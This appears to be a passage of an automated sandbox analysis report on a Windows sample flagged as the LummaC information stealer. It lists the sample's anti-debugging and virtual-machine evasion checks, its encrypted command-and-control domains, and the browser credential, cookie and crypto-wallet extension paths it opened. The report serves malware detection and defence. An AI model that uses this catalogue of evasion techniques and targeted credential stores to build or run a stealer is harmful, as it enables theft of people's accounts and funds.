              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B71 second address: 4B90B97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEBD8FBE240h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B97 second address: 4B90BA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSpecial instruction interceptor: First address: 43781D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSpecial instruction interceptor: First address: 66451F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe TID: 5808Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exe TID: 5844Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000002.2730093310.00000000005BF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: NAliwxUTJ4.exe, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.0000000005501000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: NAliwxUTJ4.exeBinary or memory string: vMcIJ
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2670051008.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2726917999.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000E75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC`e
              Source: NAliwxUTJ4.exe, 00000001.00000002.2730093310.00000000005BF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: NAliwxUTJ4.exe, 00000001.00000003.2585596365.00000000054FB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: SICE
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
              Source: NAliwxUTJ4.exe, 00000001.00000003.2484411991.0000000004A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
              Source: NAliwxUTJ4.exe, 00000001.00000002.2730093310.00000000005BF000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 2Program Manager
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673918520.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2674035293.0000000000E65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: NAliwxUTJ4.exe PID: 828, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: NAliwxUTJ4.exeString found in binary or memory: %appdata%\Electrum\wallets
              Source: NAliwxUTJ4.exeString found in binary or memory: Wallets/ElectronCash
              Source: NAliwxUTJ4.exeString found in binary or memory: Jaxx Liberty
              Source: NAliwxUTJ4.exeString found in binary or memory: window-state.json
              Source: NAliwxUTJ4.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: NAliwxUTJ4.exeString found in binary or memory: Wallets/Exodus
              Source: NAliwxUTJ4.exeString found in binary or memory: Wallets/Ethereum
              Source: NAliwxUTJ4.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: NAliwxUTJ4.exeString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
